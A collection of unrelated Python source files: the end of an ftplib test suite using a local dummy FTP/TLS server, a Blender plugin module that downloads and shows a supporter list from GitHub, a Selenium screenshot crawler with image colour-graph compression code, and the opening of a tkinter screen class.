self.assertRaises(ftplib.error_reply, self.client.delete, 'foo')
def test_size(self):
self.client.size('foo')
def test_mkd(self):
dir = self.client.mkd('/foo')
self.assertEqual(dir, '/foo')
def test_rmd(self):
self.client.rmd('foo')
def test_pwd(self):
dir = self.client.pwd()
self.assertEqual(dir, 'pwd ok')
def test_quit(self):
self.assertEqual(self.client.quit(), '221 quit ok')
# Ensure the connection gets closed; sock attribute should be None
self.assertEqual(self.client.sock, None)
def test_retrbinary(self):
def callback(data):
received.append(data.decode('ascii'))
received = []
self.client.retrbinary('retr', callback)
self.assertEqual(''.join(received), RETR_DATA)
def test_retrbinary_rest(self):
def callback(data):
received.append(data.decode('ascii'))
for rest in (0, 10, 20):
received = []
self.client.retrbinary('retr', callback, rest=rest)
self.assertEqual(''.join(received), RETR_DATA[rest:],
msg='rest test case %d %d %d' % (rest,
len(''.join(received)),
len(RETR_DATA[rest:])))
def test_retrlines(self):
received = []
self.client.retrlines('retr', received.append)
self.assertEqual(''.join(received), RETR_DATA.replace('\r\n', ''))
def test_storbinary(self):
f = io.BytesIO(RETR_DATA.encode('ascii'))
self.client.storbinary('stor', f)
self.assertEqual(self.server.handler_instance.last_received_data, RETR_DATA)
# test new callback arg
flag = []
f.seek(0)
self.client.storbinary('stor', f, callback=lambda x: flag.append(None))
self.assertTrue(flag)
def test_storbinary_rest(self):
f = io.BytesIO(RETR_DATA.replace('\r\n', '\n').encode('ascii'))
for r in (30, '30'):
f.seek(0)
self.client.storbinary('stor', f, rest=r)
self.assertEqual(self.server.handler_instance.rest, str(r))
def test_storlines(self):
f = io.BytesIO(RETR_DATA.replace('\r\n', '\n').encode('ascii'))
self.client.storlines('stor', f)
self.assertEqual(self.server.handler_instance.last_received_data, RETR_DATA)
# test new callback arg
flag = []
f.seek(0)
self.client.storlines('stor foo', f, callback=lambda x: flag.append(None))
self.assertTrue(flag)
def test_nlst(self):
self.client.nlst()
self.assertEqual(self.client.nlst(), NLST_DATA.split('\r\n')[:-1])
def test_dir(self):
l = []
self.client.dir(lambda x: l.append(x))
self.assertEqual(''.join(l), LIST_DATA.replace('\r\n', ''))
def test_makeport(self):
with self.client.makeport():
# IPv4 is in use, just make sure send_eprt has not been used
self.assertEqual(self.server.handler_instance.last_received_cmd,
'port')
def test_makepasv(self):
host, port = self.client.makepasv()
conn = socket.create_connection((host, port), 10)
conn.close()
# IPv4 is in use, just make sure send_epsv has not been used
self.assertEqual(self.server.handler_instance.last_received_cmd, 'pasv')
def test_with_statement(self):
self.client.quit()
def is_client_connected():
if self.client.sock is None:
return False
try:
self.client.sendcmd('noop')
except (socket.error, EOFError):
return False
return True
# base test
with ftplib.FTP(timeout=10) as self.client:
self.client.connect(self.server.host, self.server.port)
self.client.sendcmd('noop')
self.assertTrue(is_client_connected())
self.assertEqual(self.server.handler_instance.last_received_cmd, 'quit')
self.assertFalse(is_client_connected())
# QUIT sent inside the with block
with ftplib.FTP(timeout=10) as self.client:
self.client.connect(self.server.host, self.server.port)
self.client.sendcmd('noop')
self.client.quit()
self.assertEqual(self.server.handler_instance.last_received_cmd, 'quit')
self.assertFalse(is_client_connected())
# force a wrong response code to be sent on QUIT: error_perm
# is expected and the connection is supposed to be closed
try:
with ftplib.FTP(timeout=10) as self.client:
self.client.connect(self.server.host, self.server.port)
self.client.sendcmd('noop')
self.server.handler_instance.next_response = '550 error on quit'
except ftplib.error_perm as err:
self.assertEqual(str(err), '550 error on quit')
else:
self.fail('Exception not raised')
# needed to give the threaded server some time to set the attribute
# which otherwise would still be == 'noop'
time.sleep(0.1)
self.assertEqual(self.server.handler_instance.last_received_cmd, 'quit')
self.assertFalse(is_client_connected())
def test_parse257(self):
self.assertEqual(ftplib.parse257('257 "/foo/bar"'), '/foo/bar')
self.assertEqual(ftplib.parse257('257 "/foo/bar" created'), '/foo/bar')
self.assertEqual(ftplib.parse257('257 ""'), '')
self.assertEqual(ftplib.parse257('257 "" created'), '')
self.assertRaises(ftplib.error_reply, ftplib.parse257, '250 "/foo/bar"')
# The 257 response is supposed to include the directory
# name and in case it contains embedded double-quotes
# they must be doubled (see RFC-959, chapter 7, appendix 2).
self.assertEqual(ftplib.parse257('257 "/foo/b""ar"'), '/foo/b"ar')
self.assertEqual(ftplib.parse257('257 "/foo/b""ar" created'), '/foo/b"ar')
class TestIPv6Environment(TestCase):
def setUp(self):
self.server = DummyFTPServer((HOST, 0), af=socket.AF_INET6)
self.server.start()
self.client = ftplib.FTP()
self.client.connect(self.server.host, self.server.port)
def tearDown(self):
self.client.close()
self.server.stop()
def test_af(self):
self.assertEqual(self.client.af, socket.AF_INET6)
def test_makeport(self):
with self.client.makeport():
self.assertEqual(self.server.handler_instance.last_received_cmd,
'eprt')
def test_makepasv(self):
host, port = self.client.makepasv()
conn = socket.create_connection((host, port), 10)
conn.close()
self.assertEqual(self.server.handler_instance.last_received_cmd, 'epsv')
def test_transfer(self):
def retr():
def callback(data):
received.append(data.decode('ascii'))
received = []
self.client.retrbinary('retr', callback)
self.assertEqual(''.join(received), RETR_DATA)
self.client.set_pasv(True)
retr()
self.client.set_pasv(False)
retr()
class TestTLS_FTPClassMixin(TestFTPClass):
"""Repeat TestFTPClass tests starting the TLS layer for both control
and data connections first.
"""
def setUp(self):
self.server = DummyTLS_FTPServer((HOST, 0))
self.server.start()
self.client = ftplib.FTP_TLS(timeout=10)
self.client.connect(self.server.host, self.server.port)
# enable TLS
self.client.auth()
self.client.prot_p()
class TestTLS_FTPClass(TestCase):
"""Specific TLS_FTP class tests."""
def setUp(self):
self.server = DummyTLS_FTPServer((HOST, 0))
self.server.start()
self.client = ftplib.FTP_TLS(timeout=10)
self.client.connect(self.server.host, self.server.port)
def tearDown(self):
self.client.close()
self.server.stop()
def test_control_connection(self):
self.assertNotIsInstance(self.client.sock, ssl.SSLSocket)
self.client.auth()
self.assertIsInstance(self.client.sock, ssl.SSLSocket)
def test_data_connection(self):
# clear text
with self.client.transfercmd('list') as sock:
self.assertNotIsInstance(sock, ssl.SSLSocket)
self.assertEqual(self.client.voidresp(), "226 transfer complete")
# secured, after PROT P
self.client.prot_p()
with self.client.transfercmd('list') as sock:
self.assertIsInstance(sock, ssl.SSLSocket)
self.assertEqual(self.client.voidresp(), "226 transfer complete")
# PROT C is issued, the connection must be in cleartext again
self.client.prot_c()
with self.client.transfercmd('list') as sock:
self.assertNotIsInstance(sock, ssl.SSLSocket)
self.assertEqual(self.client.voidresp(), "226 transfer complete")
def test_login(self):
# login() is supposed to implicitly secure the control connection
self.assertNotIsInstance(self.client.sock, ssl.SSLSocket)
self.client.login()
self.assertIsInstance(self.client.sock, ssl.SSLSocket)
# make sure that AUTH TLS doesn't get issued again
self.client.login()
def test_auth_issued_twice(self):
self.client.auth()
self.assertRaises(ValueError, self.client.auth)
def test_auth_ssl(self):
try:
self.client.ssl_version = ssl.PROTOCOL_SSLv3
self.client.auth()
self.assertRaises(ValueError, self.client.auth)
finally:
self.client.ssl_version = ssl.PROTOCOL_TLSv1
def test_context(self):
self.client.quit()
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
self.assertRaises(ValueError, ftplib.FTP_TLS, keyfile=CERTFILE,
context=ctx)
self.assertRaises(ValueError, ftplib.FTP_TLS, certfile=CERTFILE,
context=ctx)
self.assertRaises(ValueError, ftplib.FTP_TLS, certfile=CERTFILE,
keyfile=CERTFILE, context=ctx)
self.client = ftplib.FTP_TLS(context=ctx, timeout=10)
self.client.connect(self.server.host, self.server.port)
self.assertNotIsInstance(self.client.sock, ssl.SSLSocket)
self.client.auth()
self.assertIs(self.client.sock.context, ctx)
self.assertIsInstance(self.client.sock, ssl.SSLSocket)
self.client.prot_p()
with self.client.transfercmd('list') as sock:
self.assertIs(sock.context, ctx)
self.assertIsInstance(sock, ssl.SSLSocket)
class TestTimeouts(TestCase):
def setUp(self):
self.evt = threading.Event()
self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.sock.settimeout(3)
self.port = support.bind_port(self.sock)
threading.Thread(target=self.server, args=(self.evt,self.sock)).start()
# Wait for the server to be ready.
self.evt.wait()
self.evt.clear()
ftplib.FTP.port = self.port
def tearDown(self):
self.evt.wait()
self.sock.close()
def server(self, evt, serv):
# This method sets the evt 3 times:
# 1) when the connection is ready to be accepted.
# 2) when it is safe for the caller to close the connection
# 3) when we have closed the socket
serv.listen(5)
# (1) Signal the caller that we are ready to accept the connection.
evt.set()
try:
conn, addr = serv.accept()
except socket.timeout:
pass
else:
conn.send(b"1 Hola mundo\n")
# (2) Signal the caller that it is safe to close the socket.
evt.set()
conn.close()
finally:
serv.close()
# (3) Signal the caller that we are done.
evt.set()
def testTimeoutDefault(self):
# default -- use global socket timeout
self.assertTrue(socket.getdefaulttimeout() is None)
socket.setdefaulttimeout(30)
try:
ftp = ftplib.FTP("localhost")
finally:
socket.setdefaulttimeout(None)
self.assertEqual(ftp.sock.gettimeout(), 30)
self.evt.wait()
ftp.close()
def testTimeoutNone(self):
# no timeout -- do not use global socket timeout
self.assertTrue(socket.getdefaulttimeout() is None)
socket.setdefaulttimeout(30)
try:
ftp = ftplib.FTP("localhost", timeout=None)
finally:
socket.setdefaulttimeout(None)
self.assertTrue(ftp.sock.gettimeout() is None)
self.evt.wait()
ftp.close()
def testTimeoutValue(self):
# a value
ftp = ftplib.FTP(HOST, timeout=30)
self.assertEqual(ftp.sock.gettimeout(), 30)
self.evt.wait()
ftp.close()
def testTimeoutConnect(self):
ftp = ftplib.FTP()
ftp.connect(HOST, timeout=30)
self.assertEqual(ftp.sock.gettimeout(), 30)
self.evt.wait()
ftp.close()
def testTimeoutDifferentOrder(self):
ftp = ftplib.FTP(timeout=30)
ftp.connect(HOST)
self.assertEqual(ftp.sock.gettimeout(), 30)
self.evt.wait()
ftp.close()
def testTimeoutDirectAccess(self):
ftp = ftplib.FTP()
ftp.timeout = 30
ftp.connect(HOST)
self.assertEqual(ftp.sock.gettimeout(), 30)
self.evt.wait()
ftp.close()
def test_main():
tests = [TestFTPClass, TestTimeouts]
if socket.has_ipv6:
try:
DummyFTPServer((HOST, 0), af=socket.AF_INET6)
except socket.error:
pass
else:
tests.append(TestIPv6Environment)
if ssl is not None:
tests.extend([TestTLS_FTPClassMixin, TestTLS_FTPClass])
thread_info = support.threading_setup()
try:
support.run_unittest(*tests)
finally:
support.threading_cleanup(*thread_info)
if __name__ == '__main__':
test_main()
|
supporter.py
|
# MIT License
# Copyright (c) 2017 GiveMeAllYourCats
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the 'Software'), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
# THE SOFTWARE IS PROVIDED 'AS IS', WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
# Code author: Hotox
# Repo: https://github.com/michaeldegroot/cats-blender-plugin
# Edits by: GiveMeAllYourCats
import os
import bpy
import json
import shutil
import pathlib
import zipfile
import webbrowser
import json.decoder
import urllib.error
import urllib.request
import tools.settings
from threading import Thread
from datetime import datetime, timezone
# global variables
preview_collections = {}
supporter_data = None
reloading = False
button_list = []
last_update = None
time_format = "%Y-%m-%d %H:%M:%S"
time_format_github = "%Y-%m-%dT%H:%M:%SZ"
main_dir = pathlib.Path(os.path.dirname(__file__)).parent.resolve()
resources_dir = os.path.join(str(main_dir), "resources")
class PatreonButton(bpy.types.Operator):
bl_idname = 'supporter.patreon'
bl_label = 'Become a Patron'
def execute(self, context):
webbrowser.open('https://www.patreon.com/catsblenderplugin')
self.report({'INFO'}, 'Patreon page opened')
return {'FINISHED'}
class ReloadButton(bpy.types.Operator):
bl_idname = 'supporter.reload'
bl_label = 'Reload List'
bl_description = 'Reloads the supporter list'
@classmethod
def poll(cls, context):
return not reloading
def execute(self, context):
global reloading
reloading = True
thread = Thread(target=download_file, args=[])
thread.start()
return {'FINISHED'}
class DynamicPatronButton(bpy.types.Operator):
bl_idname = 'support.dynamic_patron_button'
bl_label = 'Supporter Name'
bl_description = 'This is an awesome supporter'
website = None
def execute(self, context):
if self.website:
webbrowser.open(self.website)
return {'FINISHED'}
def register_dynamic_buttons():
if not supporter_data:
return
temp_idnames = []
for supporter in supporter_data.get('supporters'):
if supporter.get('disabled'):
continue
name = supporter.get('displayname')
idname = 'support.' + ''.join(filter(str.isalpha, name.lower()))
description = name + ' is an awesome supporter'
if supporter.get('description'):
# description = name + ' says:\n\n' + supporter.get('description') + '\n'
description = supporter.get('description')
website = None
if supporter.get('website'):
website = supporter.get('website')
while idname in temp_idnames:
idname += '2'
button = type('DynOp_' + name, (DynamicPatronButton, ),
{'bl_idname': idname,
'bl_label': name,
'bl_description': description,
'website': website
})
button_list.append(button)
supporter['idname'] = idname
temp_idnames.append(idname)
bpy.utils.register_class(button)
def unregister_dynamic_buttons():
for button in button_list:
try:
bpy.utils.unregister_class(button)
except RuntimeError:
pass
button_list.clear()
def download_file():
# Load all the directories and files
downloads_dir = os.path.join(resources_dir, "downloads")
extracted_zip_dir = os.path.join(downloads_dir, "cats_supporter_list-master")
icons_dir = os.path.join(resources_dir, "icons")
icons_supporter_dir = os.path.join(icons_dir, "supporters")
supporter_zip_file = os.path.join(downloads_dir, "cats_supporter_list.zip")
supporter_list_file = os.path.join(resources_dir, "supporters.json")
extracted_supporter_list_file = os.path.join(extracted_zip_dir, "supporters.json")
extracted_icons_dir = os.path.join(extracted_zip_dir, "supporters")
# Create download folder
pathlib.Path(downloads_dir).mkdir(exist_ok=True)
# Download zip
print('DOWNLOAD FILE')
try:
urllib.request.urlretrieve("https://github.com/Darkblader24/cats_supporter_list/archive/master.zip", supporter_zip_file)
except urllib.error.URLError:
print("FILE COULD NOT BE DOWNLOADED")
shutil.rmtree(downloads_dir)
finish_reloading()
return
print('DOWNLOAD FINISHED')
# If zip is not downloaded, abort
if not os.path.isfile(supporter_zip_file):
print("ZIP NOT FOUND!")
shutil.rmtree(downloads_dir)
finish_reloading()
return
# Extract the downloaded zip
print('EXTRACTING ZIP')
with zipfile.ZipFile(supporter_zip_file, "r") as zip_ref:
zip_ref.extractall(downloads_dir)
print('EXTRACTED')
# If zip is not extracted, abort
if not os.path.isdir(extracted_zip_dir):
print("EXTRACTED ZIP FOLDER NOT FOUND!")
shutil.rmtree(downloads_dir)
finish_reloading()
return
# delete existing supporter list and icon folder
if os.path.isfile(supporter_list_file):
print("REMOVED SUPPORT LIST")
os.remove(supporter_list_file)
if os.path.isdir(icons_supporter_dir):
print("REMOVED ICON DIR")
shutil.rmtree(icons_supporter_dir)
# Move the extracted files to their correct places
shutil.move(extracted_supporter_list_file, supporter_list_file)
shutil.move(extracted_icons_dir, icons_dir)
# Delete download folder
shutil.rmtree(downloads_dir)
# Save update time in settings
tools.settings.set_last_supporter_update(last_update)
# Reload supporters
reload_supporters()
def readJson():
supporters_file = os.path.join(resources_dir, "supporters.json")
print('READING FILE')
if not os.path.isfile(supporters_file):
print("SUPPORTER LIST FILE NOT FOUND!")
return
print("SUPPORTER LIST FILE FOUND!")
try:
with open(supporters_file, encoding="utf8") as f:
data = json.load(f)
except json.decoder.JSONDecodeError:
return
global supporter_data
supporter_data = data
def load_supporters():
# Check for update
global reloading
reloading = True
thread = Thread(target=check_for_update, args=[])
thread.start()
# Read existing supporter list
readJson()
# Note that preview collections returned by bpy.utils.previews
# are regular py objects - you can use them to store custom data.
pcoll = bpy.utils.previews.new()
# load the supporters and news icons
load_icons(pcoll)
if preview_collections.get('supporter_icons'):
bpy.utils.previews.remove(preview_collections['supporter_icons'])
preview_collections['supporter_icons'] = pcoll
def reload_supporters():
# Read the support file
readJson()
# Get existing preview collection or create new one
if preview_collections.get('supporter_icons'):
pcoll = preview_collections['supporter_icons']
else:
pcoll = bpy.utils.previews.new()
# load the supporters and news icons
load_icons(pcoll)
if not preview_collections.get('supporter_icons'):
preview_collections['supporter_icons'] = pcoll
unregister_dynamic_buttons()
register_dynamic_buttons()
# Finish reloading
finish_reloading()
def load_icons(pcoll):
# path to the folder where the icon is
# the path is calculated relative to this py file inside the addon folder
icons_dir = os.path.join(resources_dir, "icons")
icons_supporter_dir = os.path.join(icons_dir, "supporters")
if supporter_data:
for supporter in supporter_data['supporters']:
if supporter.get('disabled'):
continue
name = supporter['displayname']
iconname = supporter.get('iconname')
if not iconname:
iconname = name
if name in pcoll:
continue
try:
pcoll.load(name, os.path.join(icons_supporter_dir, iconname + '.png'), 'IMAGE')
except KeyError:
pass
for news in supporter_data['news']:
custom_icon = news.get('custom_icon')
if news.get('disabled') or not news.get('info') or not custom_icon or custom_icon in pcoll:
continue
try:
pcoll.load(custom_icon, os.path.join(icons_supporter_dir, custom_icon + '.png'), 'IMAGE')
except KeyError:
pass
def finish_reloading():
# Set running false
global reloading
reloading = False
# Refresh ui because of async running
ui_refresh()
def load_other_icons():
# Note that preview collections returned by bpy.utils.previews
# are regular py objects - you can use them to store custom data.
pcoll = bpy.utils.previews.new()
# path to the folder where the icon is
# the path is calculated relative to this py file inside the addon folder
icons_dir = os.path.join(resources_dir, "icons")
icons_other_dir = os.path.join(icons_dir, "other")
# load a preview thumbnail of a file and store in the previews collection
pcoll.load('heart1', os.path.join(icons_other_dir, 'heart1.png'), 'IMAGE')
pcoll.load('discord1', os.path.join(icons_other_dir, 'discord1.png'), 'IMAGE')
pcoll.load('cats1', os.path.join(icons_other_dir, 'cats1.png'), 'IMAGE')
pcoll.load('empty', os.path.join(icons_other_dir, 'empty.png'), 'IMAGE')
pcoll.load('UP_ARROW', os.path.join(icons_other_dir, 'blender_up_arrow.png'), 'IMAGE')
# pcoll.load('TRANSLATE', os.path.join(icons_other_dir, 'translate.png'), 'IMAGE')
preview_collections['custom_icons'] = pcoll
def unload_icons():
print('UNLOADING ICONS!')
for pcoll in preview_collections.values():
bpy.utils.previews.remove(pcoll)
preview_collections.clear()
print('DONE!')
def ui_refresh():
# A way to refresh the ui
if bpy.data.window_managers:
for windowManager in bpy.data.window_managers:
for window in windowManager.windows:
for area in window.screen.areas:
area.tag_redraw()
def check_for_update():
if update_needed():
download_file()
else:
finish_reloading()
def update_needed():
print('CHECK UPDATE')
try:
with urllib.request.urlopen("https://api.github.com/repos/Darkblader24/cats_supporter_list/commits/master") as url:
data = json.loads(url.read().decode())
except urllib.error.URLError:
print('URL ERROR')
return False
try:
last_commit_date = datetime.strptime(data['commit']['author']['date'], time_format_github)
except KeyError:
print('DATA NOT READABLE')
return False
global last_update
commit_date_str = last_commit_date.strftime(time_format)
last_update = commit_date_str
print(last_update)
if not tools.settings.get_last_supporter_update():
print('SETTINGS NOT FOUND')
return True
last_update_str = tools.settings.get_last_supporter_update()
if commit_date_str == last_update_str:
print('COMMIT IDENTICAL')
return False
utc_now = datetime.strptime(datetime.now(timezone.utc).strftime(time_format), time_format)
time_delta = abs((utc_now - last_commit_date).seconds)
print(utc_now)
print(time_delta)
if time_delta <= 120:
print('COMMIT TOO CLOSE')
return False
print('UPDATE NEEDED')
return True
|
penguin.py
|
# TODO: Internet connectivity speed benchmark
# TODO: Docs
import ast
import os
import shutil
import threading
import time
from PIL import Image
from selenium.webdriver import Chrome
from selenium.webdriver.chrome.options import Options
COMPRESSED_COLOR_SPACE = 262144 # 64 ** 3
STATIC_RESOURCE_PATH = 'static'
# TODO: PROCESSED_DATA_PATH = 'data'
class Penguin:
# TODO: compute max run time based on timeout and website list, have display of estimated time of completion, etc.
def __init__(self, chrome_count):
self.drivers = [threading.Thread(target=self.driver_thread_function) for __ in xrange(chrome_count)]
self.driver_functionality = None
self.page_timeout = 30 # default 30 seconds
self.is_headless = True # default headless mode
self.use_ublock = True # default use ublock
self.image_handler_thread = threading.Thread(target=self.image_handler_thread_function)
self.image_handler_functionality = None
self.max_queue_length = 0
self.source_enabled = False
self.source_handler_thread = threading.Thread(target=self.source_handler_thread_function)
self.source_handler_functionality = None
self.websites = []
self.timeout_sites = []
def image_handler(self, funct):
def wrapper():
return funct()
self.image_handler_functionality = wrapper
return None
def image_handler_thread_function(self):
if self.image_handler_functionality is None:
raise NotImplementedError('Image Handler functionality must be defined, i.e. @Penguin.image_handler')
try:
for i in xrange(10000000): # ten million
state, queue_length = self.image_handler_functionality()
self.max_queue_length = max(queue_length, self.max_queue_length)
if state is False:
break
finally:
pass
def source_handler(self, funct):
def wrapper():
return funct()
self.source_handler_functionality = wrapper
return None
def source_handler_thread_function(self):
if not self.source_enabled:
raise ValueError('Source is not enabled for this client')
if self.source_handler_functionality is None:
raise NotImplementedError('Source Handler functionality must be defined, i.e. @Penguin.source_handler')
try:
for i in xrange(10000000): # ten million
state = self.source_handler_functionality()
if state is False:
break
finally:
pass
def driver(self, funct):
def wrapper(websites, driver, timeouts):
return funct(websites, driver, timeouts)
self.driver_functionality = wrapper
return None
def load_driver(self):
options = Options()
if self.use_ublock:
ublock0_path = get_path('uBlock0', target='uBlock0.chromium')
options.add_argument('load-extension=' + ublock0_path)
if self.headless:
options.add_argument('window-size=1300,750')
options.add_argument('window-position=2000,0')
try:
chromedriver_path = get_path('chromedriver', target='chromedriver.exe')
driver = Chrome(executable_path=chromedriver_path, chrome_options=options)
except ValueError:
driver = Chrome(chrome_options=options)
driver.set_page_load_timeout(self.page_timeout)
return driver
def driver_thread_function(self):
if self.driver_functionality is None:
raise NotImplementedError('Driver functionality must be defined, i.e. @Penguin.driver')
driver = self.load_driver()
try:
for i in xrange(5000000): # five million, gracefully exits after five million iterations
continue_state = self.driver_functionality(self.websites, driver, self.timeout_sites)
if continue_state is False:
break
finally:
driver.quit()
def run(self):
start = time.time()
locked_source_enabled = self.source_enabled
if not os.path.exists('.temp'):
os.makedirs('.temp')
if locked_source_enabled:
if not os.path.exists('.temp/source'):
os.makedirs('.temp/source')
if not os.path.exists('.temp/image'):
os.makedirs('.temp/image')
if not os.path.exists('data'):
os.makedirs('data')
self.image_handler_thread.start()
if locked_source_enabled:
self.source_handler_thread.start()
for t in self.drivers:
t.start()
for t in self.drivers:
t.join()
while len(os.listdir('.temp/image')) != 0:
time.sleep(.1)
shutil.rmtree('.temp/image')
self.image_handler_thread.join()
if locked_source_enabled:
while len(os.listdir('.temp/source')) != 0:
time.sleep(.1)
shutil.rmtree('.temp/source')
self.source_handler_thread.join()
shutil.rmtree('.temp')
return time.time() - start
def ublock(self, use_ublock=True):
self.use_ublock = use_ublock
def headless(self, is_headless=True):
self.is_headless = is_headless
def timeout(self, seconds):
self.page_timeout = seconds
def source(self, enable=True):
self.source_enabled = enable
def save_timeouts(self, file='data/timeouts.csv'):
with open(file, 'a') as timeout_log:
for line in self.timeout_sites:
timeout_log.write(line[0] + ', ' + line[1] + '\n')
def add_websites(self, start, end):
self.websites.extend(load_sites(start, end))
return self
def get_path(resource, target, version='LATEST'):
try:
os.listdir(STATIC_RESOURCE_PATH)
except OSError:
raise ValueError('\'%s\' is not a valid path to the static resources' % STATIC_RESOURCE_PATH)
if resource not in os.listdir(STATIC_RESOURCE_PATH):
raise ValueError('Specified resource not in the static directory')
available_versions = os.listdir(STATIC_RESOURCE_PATH + '/' + resource)
if len(available_versions) == 0:
raise ValueError('No available resources found in the static/' + resource + ' directory')
relative_path = os.getcwd().replace('\\', '/')
if version == 'LATEST':
return relative_path + '/' + STATIC_RESOURCE_PATH + '/' + resource + '/%s/%s' % (available_versions[-1], target)
else:
if 'version_%s' % version in available_versions:
return relative_path + '/' + STATIC_RESOURCE_PATH + '/' + resource + '/version_%s/%s' % (version, target)
else:
raise ValueError('Specified version not found in the static/' + resource + ' directory')
def load_sites(a, b):
website_path = get_path('websites', target='websites.csv')
site_list = []
with open(website_path, 'r') as f:
for i, line in enumerate(f):
if a <= i < b:
full_domain = line.rstrip('\n')
base_domain = full_domain.split('.')[0]
site_list.append(('http://' + full_domain, base_domain))
elif i >= b:
break
return site_list
def convert_adjacency_to_dph(adj_filename, imagename, dph_filename):
header, adj_list = parse_adjacency_file(adj_filename, imagename)
sorted_pair_list = convert_adjlist_to_pairlist(header, adj_list)
difference_compressed_pair_list = difference_compression(sorted_pair_list)
write_pair_list_hex(dph_filename, header, difference_compressed_pair_list)
# TODO: add header value catch statements
def convert_dph_to_adjacency(dph_filename, imagename, adj_filename):
header, diff_pair_hex_list = parse_dph_file(dph_filename, imagename)
difference_decompressed_pair_list = difference_decompression(diff_pair_hex_list)
adj_list = convert_pairlist_to_adjlist(header, difference_decompressed_pair_list)
write_adj_list(adj_filename, header, adj_list)
def write_adj_list(filename, head, adj_list):
with open(filename, 'w') as adj_file:
adj_file.write(str(head) + '\n')
for neighbors in adj_list:
adj_file.write(str(neighbors) + '\n')
def write_pair_list_hex(filename, head, pair_list):
delimiter = '.'
head['delimiter'] = delimiter
with open(filename, 'w') as dph_file:
dph_file.write(str(head) + '\n')
for tuple in pair_list:
dph_file.write(hex_blanking_format(tuple, delimiter) + '\n')
def hex_blanking_format(t, d):
s = ''
if t[0] == 0:
s += d
else:
s += str(hex(t[0])) + d
if t[1] == 0:
s += d
else:
s += str(hex(t[1])) + d
if t[2] != 1:
s += str(hex(t[2]))
return s.replace('0x', '')
def difference_compression(pair_list):
last_a = last_b = 0
for i in xrange(len(pair_list)):
temp = pair_list[i]
pair_list[i] = (temp[0] - last_a, temp[1] - last_b, temp[2])
last_a = temp[0]
last_b = temp[1]
return pair_list
def difference_decompression(pair_list):
last_a = last_b = 0
for i in xrange(len(pair_list)):
temp = pair_list[i]
pair_list[i] = (temp[0] + last_a, temp[1] + last_b, temp[2])
last_a += temp[0]
last_b += temp[1]
return pair_list
def color_compression(pixel):
red = pixel[0]
green = pixel[1]
blue = pixel[2]
int_rep_color = ((red / 4) * (64 ** 2)) + ((green / 4) * 64) + (blue / 4)
return int_rep_color
def color_decompression(int_rep_color):
blue = (int_rep_color % 64) * 4
green = ((int_rep_color / 64) % 64) * 4
red = (int_rep_color / (64 ** 2)) * 4
return red, green, blue
# TODO: error checking with header
def convert_pairlist_to_adjlist(head, pair_list):
adjacency_list = [[] for __ in xrange(COMPRESSED_COLOR_SPACE)]
for edge in pair_list:
adjacency_list[edge[0]] += [(edge[1], edge[2])]
return adjacency_list
# TODO: check for total weight head['total_weight']
def convert_adjlist_to_pairlist(head, alist):
raw_pair_list = []
for a in xrange(len(alist)):
for tuple in alist[a]:
edge_pair = sorted([a, tuple[0]])
raw_pair_list += [(edge_pair[0], edge_pair[1], tuple[1])]
if len(raw_pair_list) != head['edges']:
pass # raise FileHeaderValueError(head['image'], 'edges', head['edges'], len(raw_pair_list))
return sorted(raw_pair_list)
def parse_adjacency_file(imagename, filename):
with open(filename, 'r') as adj_file:
header_line = adj_file.readline().replace('\n', '')
header_dictionary = ast.literal_eval(header_line)
if header_dictionary['image'] != imagename:
pass # TODO: fix -> raise ValueError(imagename, 'image', imagename, header_dictionary['image'])
adjacency_list = []
for i, l in enumerate(adj_file):
adjacency_list += [ast.literal_eval(l.replace('\n', ''))]
return header_dictionary, adjacency_list
def parse_dph_file(imagename, filename):
with open(filename, 'r') as dph_file:
header_line = dph_file.readline().replace('\n', '')
header_dictionary = ast.literal_eval(header_line)
if header_dictionary['image'] != imagename:
pass # TODO: fix -> raise ValueError(imagename, 'image', imagename, header_dictionary['image'])
dph_list = []
for i, l in enumerate(dph_file):
split_line = l.replace('\n', '').split(header_dictionary['delimiter'])
a = b = 0
c = 1
if split_line[0] != '':
a = int(split_line[0], 16)
if split_line[1] != '':
b = int(split_line[1], 16)
if split_line[2] != '':
c = int(split_line[2], 16)
dph_list += [(a, b, c)]
return header_dictionary, dph_list
def add_color_edge(a_list, a, b):
x, y = sorted([a, b])
for neighbor in a_list[x]:
if neighbor[0] == y:
neighbor[1] += 1
return # this caused an error in original code (must be inside if statement, not after)
else:
a_list[x].append([y, 1])
# returns size of dph file
def imagefile_to_dphfile(image_filename, imagename, dph_filename):
adjacency_list = [[] for __ in xrange(COMPRESSED_COLOR_SPACE)]
list1 = []
list2 = []
weight_count = 0
im = Image.open(image_filename).convert('RGB')
pixel = im.load()
width, height = im.size
im.close()
for y in xrange(0, height, 10):
for x in xrange(0, width, 10):
rgb_pixel = pixel[x, y]
cur_x = x / 10
cur_y = y / 10
list1.append(color_compression(rgb_pixel))
if cur_x != 0:
add_color_edge(adjacency_list, list1[cur_x], list1[cur_x - 1])
weight_count += 1
if cur_y != 0:
add_color_edge(adjacency_list, list1[cur_x], list2[cur_x])
weight_count += 1
list2 = list(list1)
list1 = []
edge_count = 0
for neighbor_list in adjacency_list:
edge_count += len(neighbor_list)
header = {'delimiter': '.', 'image': imagename, 'edges': edge_count, 'total_weight': weight_count}
sorted_pair_list = convert_adjlist_to_pairlist(header, adjacency_list)
difference_compressed_pair_list = difference_compression(sorted_pair_list)
write_pair_list_hex(dph_filename, header, difference_compressed_pair_list)
|
screen.py
|
import os
import tkinter as tk
import time
from threading import Thread
from config import config
class Screen:
def __init__(self, initial_picture="init.gif"):
"""
init the class and shows the window default image configurable
"""
self.imgPath = os.path.join(config.PICTUREPATH, initial_picture)
self.__show_window()
def __open_window(self):
"""
